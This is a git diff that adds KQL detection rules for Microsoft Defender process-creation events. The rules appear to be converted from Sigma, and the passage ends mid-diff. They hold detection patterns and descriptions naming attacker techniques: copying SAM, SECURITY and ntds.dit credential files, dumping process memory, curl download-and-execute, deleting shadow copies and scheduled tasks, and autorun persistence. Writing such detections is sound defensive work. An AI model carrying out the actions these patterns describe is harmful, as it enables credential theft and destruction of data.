diff --git a/KQL/rules/windows/process_creation/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql b/KQL/rules/windows/process_creation/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql
new file mode 100644
index 00000000..c6def7c1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-27
+// Level: high
+// Description: Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains " \\\\")) and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/copy_from_or_to_admin_share_or_sysvol_folder.kql b/KQL/rules/windows/process_creation/copy_from_or_to_admin_share_or_sysvol_folder.kql
new file mode 100644
index 00000000..10174710
--- /dev/null
+++ b/KQL/rules/windows/process_creation/copy_from_or_to_admin_share_or_sysvol_folder.kql
@@ -0,0 +1,12 @@
+// Title: Copy From Or To Admin Share Or Sysvol Folder
+// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
+// Date: 2019-12-30
+// Level: medium
+// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002
+// False Positives:
+//   - Administrative scripts
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains " move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell_ise.exe" or FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("powershell_ise.exe", "PowerShell.EXE", "pwsh.dll")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/copy_from_volumeshadowcopy_via_cmd_exe.kql b/KQL/rules/windows/process_creation/copy_from_volumeshadowcopy_via_cmd_exe.kql
new file mode 100644
index 00000000..c3fb7683
--- /dev/null
+++ b/KQL/rules/windows/process_creation/copy_from_volumeshadowcopy_via_cmd_exe.kql
@@ -0,0 +1,12 @@
+// Title: Copy From VolumeShadowCopy Via Cmd.EXE
+// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
+// Date: 2021-08-09
+// Level: high
+// Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+// False Positives:
+//   - Backup scenarios using the commandline
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/copying_sensitive_files_with_credential_data.kql b/KQL/rules/windows/process_creation/copying_sensitive_files_with_credential_data.kql
new file mode 100644
index 00000000..f537d536
--- /dev/null
+++ b/KQL/rules/windows/process_creation/copying_sensitive_files_with_credential_data.kql
@@ -0,0 +1,12 @@
+// Title: Copying Sensitive Files with Credential Data
+// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
+// Date: 2019-10-22
+// Level: high
+// Description: Files with well-known filenames (sensitive files with credential data) copying
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002, attack.t1003.003, car.2013-07-001, attack.s0404
+// False Positives:
+//   - Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic investigator.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "vss" or ProcessCommandLine contains " -m " or ProcessCommandLine contains " /m " or ProcessCommandLine contains " –m " or ProcessCommandLine contains " —m " or ProcessCommandLine contains " ―m " or ProcessCommandLine contains " -y " or ProcessCommandLine contains " /y " or ProcessCommandLine contains " –y " or ProcessCommandLine contains " —y " or ProcessCommandLine contains " ―y ") and (FolderPath endswith "\\esentutl.exe" or ProcessVersionInfoOriginalFileName =~ "\\esentutl.exe")) or (ProcessCommandLine contains "\\config\\RegBack\\sam" or ProcessCommandLine contains "\\config\\RegBack\\security" or ProcessCommandLine contains "\\config\\RegBack\\system" or ProcessCommandLine contains "\\config\\sam" or ProcessCommandLine contains "\\config\\security" or ProcessCommandLine contains "\\config\\system " or ProcessCommandLine contains "\\repair\\sam" or ProcessCommandLine contains "\\repair\\security" or ProcessCommandLine contains "\\repair\\system" or ProcessCommandLine contains "\\windows\\ntds\\ntds.dit")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/createdump_process_dump.kql b/KQL/rules/windows/process_creation/createdump_process_dump.kql
new file mode 100644
index 00000000..bd04aae3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/createdump_process_dump.kql
@@ -0,0 +1,12 @@
+// Title: CreateDump Process Dump
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-04
+// Level: high
+// Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+//   - Command lines that use the same flags
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -u " or ProcessCommandLine contains " --full " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " --name " or ProcessCommandLine contains ".dmp ") and (FolderPath endswith "\\createdump.exe" or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/csc_exe_execution_form_potentially_suspicious_parent.kql b/KQL/rules/windows/process_creation/csc_exe_execution_form_potentially_suspicious_parent.kql
new file mode 100644
index 00000000..ad7a5ef6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/csc_exe_execution_form_potentially_suspicious_parent.kql
@@ -0,0 +1,10 @@
+// Title: Csc.EXE Execution Form Potentially Suspicious Parent
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2019-02-11
+// Level: high
+// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense-evasion, attack.t1218.005, attack.t1027.004
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cscript_wscript_potentially_suspicious_child_process.kql b/KQL/rules/windows/process_creation/cscript_wscript_potentially_suspicious_child_process.kql
new file mode 100644
index 00000000..69b37b3c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cscript_wscript_potentially_suspicious_child_process.kql
@@ -0,0 +1,13 @@
+// Title: Cscript/Wscript Potentially Suspicious Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86')
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32.
+// Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly.
+
+DeviceProcessEvents
+| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith "\\rundll32.exe" or ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and ((ProcessCommandLine contains "mshta" and ProcessCommandLine contains "http") or (ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "msiexec")))) and (not(((ProcessCommandLine contains "UpdatePerUserSystemParameters" or ProcessCommandLine contains "PrintUIEntry" or ProcessCommandLine contains "ClearMyTracksByProcess") and FolderPath endswith "\\rundll32.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/cscript_wscript_uncommon_script_extension_execution.kql b/KQL/rules/windows/process_creation/cscript_wscript_uncommon_script_extension_execution.kql
new file mode 100644
index 00000000..c0eb9fa8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/cscript_wscript_uncommon_script_extension_execution.kql
@@ -0,0 +1,10 @@
+// Title: Cscript/Wscript Uncommon Script Extension Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: high
+// Description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".csv" or ProcessCommandLine contains ".dat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and ((ProcessVersionInfoOriginalFileName in~ ("wscript.exe", "cscript.exe")) or (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/curl_download_and_execute_combination.kql b/KQL/rules/windows/process_creation/curl_download_and_execute_combination.kql
new file mode 100644
index 00000000..ead43930
--- /dev/null
+++ b/KQL/rules/windows/process_creation/curl_download_and_execute_combination.kql
@@ -0,0 +1,10 @@
+// Title: Curl Download And Execute Combination
+// Author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-01-13
+// Level: high
+// Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o" and ProcessCommandLine contains "&") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql b/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql
new file mode 100644
index 00000000..af558ad1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql
@@ -0,0 +1,10 @@
+// Title: Curl Web Request With Potential Custom User-Agent
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and (ProcessCommandLine matches regex "\\s-H\\s" or ProcessCommandLine contains "--header") and ProcessCommandLine contains "User-Agent:"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/data_copied_to_clipboard_via_clip_exe.kql b/KQL/rules/windows/process_creation/data_copied_to_clipboard_via_clip_exe.kql
new file mode 100644
index 00000000..8cb84e79
--- /dev/null
+++ b/KQL/rules/windows/process_creation/data_copied_to_clipboard_via_clip_exe.kql
@@ -0,0 +1,10 @@
+// Title: Data Copied To Clipboard Via Clip.EXE
+// Author: frack113
+// Date: 2021-07-27
+// Level: low
+// Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1115
+
+DeviceProcessEvents
+| where FolderPath endswith "\\clip.exe" or ProcessVersionInfoOriginalFileName =~ "clip.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/data_export_from_mssql_table_via_bcp_exe.kql b/KQL/rules/windows/process_creation/data_export_from_mssql_table_via_bcp_exe.kql
new file mode 100644
index 00000000..91944e9b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/data_export_from_mssql_table_via_bcp_exe.kql
@@ -0,0 +1,13 @@
+// Title: Data Export From MSSQL Table Via BCP.EXE
+// Author: Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-08-20
+// Level: medium
+// Description: Detects the execution of the BCP utility in order to export data from the database.
+// Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.exfiltration, attack.t1048
+// False Positives:
+//   - Legitimate data export operations.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " out " or ProcessCommandLine contains " queryout ") and (FolderPath endswith "\\bcp.exe" or ProcessVersionInfoOriginalFileName =~ "BCP.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/delete_all_scheduled_tasks.kql b/KQL/rules/windows/process_creation/delete_all_scheduled_tasks.kql
new file mode 100644
index 00000000..3b763009
--- /dev/null
+++ b/KQL/rules/windows/process_creation/delete_all_scheduled_tasks.kql
@@ -0,0 +1,12 @@
+// Title: Delete All Scheduled Tasks
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /delete " and ProcessCommandLine contains "/tn *" and ProcessCommandLine contains " /f") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/delete_important_scheduled_task.kql b/KQL/rules/windows/process_creation/delete_important_scheduled_task.kql
new file mode 100644
index 00000000..81a41fb2
--- /dev/null
+++ b/KQL/rules/windows/process_creation/delete_important_scheduled_task.kql
@@ -0,0 +1,12 @@
+// Title: Delete Important Scheduled Task
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/tn") and FolderPath endswith "\\schtasks.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/deleted_data_overwritten_via_cipher_exe.kql b/KQL/rules/windows/process_creation/deleted_data_overwritten_via_cipher_exe.kql
new file mode 100644
index 00000000..7b5a1979
--- /dev/null
+++ b/KQL/rules/windows/process_creation/deleted_data_overwritten_via_cipher_exe.kql
@@ -0,0 +1,12 @@
+// Title: Deleted Data Overwritten Via Cipher.EXE
+// Author: frack113
+// Date: 2021-12-26
+// Level: medium
+// Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk.
+// Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.
+// Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /w:" and (ProcessVersionInfoOriginalFileName =~ "CIPHER.EXE" or FolderPath endswith "\\cipher.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql b/KQL/rules/windows/process_creation/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql
new file mode 100644
index 00000000..aa94672f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql
@@ -0,0 +1,10 @@
+// Title: Deletion of Volume Shadow Copies via WMI with PowerShell
+// Author: Tim Rauch, Elastic (idea)
+// Date: 2022-09-20
+// Level: high
+// Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1490
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ".Delete()" or ProcessCommandLine contains "Remove-WmiObject" or ProcessCommandLine contains "rwmi" or ProcessCommandLine contains "Remove-CimInstance" or ProcessCommandLine contains "rcim") and (ProcessCommandLine contains "Get-WmiObject" or ProcessCommandLine contains "gwmi" or ProcessCommandLine contains "Get-CimInstance" or ProcessCommandLine contains "gcim") and ProcessCommandLine contains "Win32_ShadowCopy"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/windows/process_creation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql
new file mode 100644
index 00000000..22afb0d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql
@@ -0,0 +1,10 @@
+// Title: Deny Service Access Using Security Descriptor Tampering Via Sc.EXE
+// Author: Jonhnathan Ribeiro, oscd.community
+// Date: 2020-10-16
+// Level: high
+// Description: Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1543.003
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "D;") and (ProcessCommandLine contains ";IU" or ProcessCommandLine contains ";SU" or ProcessCommandLine contains ";BA" or ProcessCommandLine contains ";SY" or ProcessCommandLine contains ";WD")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/detected_windows_software_discovery.kql b/KQL/rules/windows/process_creation/detected_windows_software_discovery.kql
new file mode 100644
index 00000000..7ddb7276
--- /dev/null
+++ b/KQL/rules/windows/process_creation/detected_windows_software_discovery.kql
@@ -0,0 +1,12 @@
+// Title: Detected Windows Software Discovery
+// Author: Nikita Nazarov, oscd.community
+// Date: 2020-10-16
+// Level: medium
+// Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518
+// False Positives:
+//   - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "query" and ProcessCommandLine contains "\\software\\" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "svcversion") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/detection_of_powershell_execution_via_sqlps_exe.kql b/KQL/rules/windows/process_creation/detection_of_powershell_execution_via_sqlps_exe.kql
new file mode 100644
index 00000000..310d4825
--- /dev/null
+++ b/KQL/rules/windows/process_creation/detection_of_powershell_execution_via_sqlps_exe.kql
@@ -0,0 +1,13 @@
+// Title: Detection of PowerShell Execution via Sqlps.exe
+// Author: Agro (@agro_sev) oscd.community
+// Date: 2020-10-10
+// Level: medium
+// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.
+// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127
+// False Positives:
+//   - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql b/KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql
new file mode 100644
index 00000000..d0fa7173
--- /dev/null
+++ b/KQL/rules/windows/process_creation/devcon_execution_disabling_vmware_vmci_device.kql
@@ -0,0 +1,15 @@
+// Title: Devcon Execution Disabling VMware VMCI Device
+// Author: Matt Anderson, Dray Agha, Anna Pham (Huntress)
+// Date: 2026-01-02
+// Level: high
+// Description: Detects execution of devcon.exe with commands that disable the VMware Virtual Machine Communication Interface (VMCI) device.
+// This can be legitimate during VMware Tools troubleshooting or driver conflicts, but may also indicate malware attempting to hijack communication with the hardware via the VMCI device.
+// This has been used to facilitate VMware ESXi vulnerability exploits to escape VMs and execute code on the ESXi host.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1543.003, attack.t1562.001
+// False Positives:
+//   - Legitimate VMware administration, Tools installation/uninstallation, or troubleshooting driver conflicts.
+//   - Automated scripts in virtualized environments for device cleanup.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " disable " and (FolderPath endswith "\\devcon.exe" or ProcessVersionInfoOriginalFileName =~ "DevCon.exe") and (ProcessCommandLine contains "15AD&DEV_0740" or ProcessCommandLine contains "VMWVMCIHOSTDEV")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/devicecredentialdeployment_execution.kql b/KQL/rules/windows/process_creation/devicecredentialdeployment_execution.kql
new file mode 100644
index 00000000..5f66dc20
--- /dev/null
+++ b/KQL/rules/windows/process_creation/devicecredentialdeployment_execution.kql
@@ -0,0 +1,12 @@
+// Title: DeviceCredentialDeployment Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects the execution of DeviceCredentialDeployment to hide a process from view.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\DeviceCredentialDeployment.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/devtoolslauncher_exe_executes_specified_binary.kql b/KQL/rules/windows/process_creation/devtoolslauncher_exe_executes_specified_binary.kql
new file mode 100644
index 00000000..db3e6a16
--- /dev/null
+++ b/KQL/rules/windows/process_creation/devtoolslauncher_exe_executes_specified_binary.kql
@@ -0,0 +1,12 @@
+// Title: Devtoolslauncher.exe Executes Specified Binary
+// Author: Beyu Denis, oscd.community (rule), @_felamos (idea)
+// Date: 2019-10-12
+// Level: high
+// Description: The Devtoolslauncher.exe executes other binary
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate use of devtoolslauncher.exe by legitimate user
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "LaunchForDeploy" and FolderPath endswith "\\devtoolslauncher.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/direct_autorun_keys_modification.kql b/KQL/rules/windows/process_creation/direct_autorun_keys_modification.kql
new file mode 100644
index 00000000..2b5db063
--- /dev/null
+++ b/KQL/rules/windows/process_creation/direct_autorun_keys_modification.kql
@@ -0,0 +1,14 @@
+// Title: Direct Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
+//   - Legitimate administrator sets up autorun keys for legitimate reasons.
+//   - Discord
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "add" and (ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" or ProcessCommandLine contains "\\software\\Microsoft\\Windows NT\\CurrentVersion\\Windows" or ProcessCommandLine contains "\\software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" or ProcessCommandLine contains "\\system\\CurrentControlSet\\Control\\SafeBoot\\AlternateShell") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/directory_removal_via_rmdir.kql b/KQL/rules/windows/process_creation/directory_removal_via_rmdir.kql
new file mode 100644
index 00000000..95270396
--- /dev/null
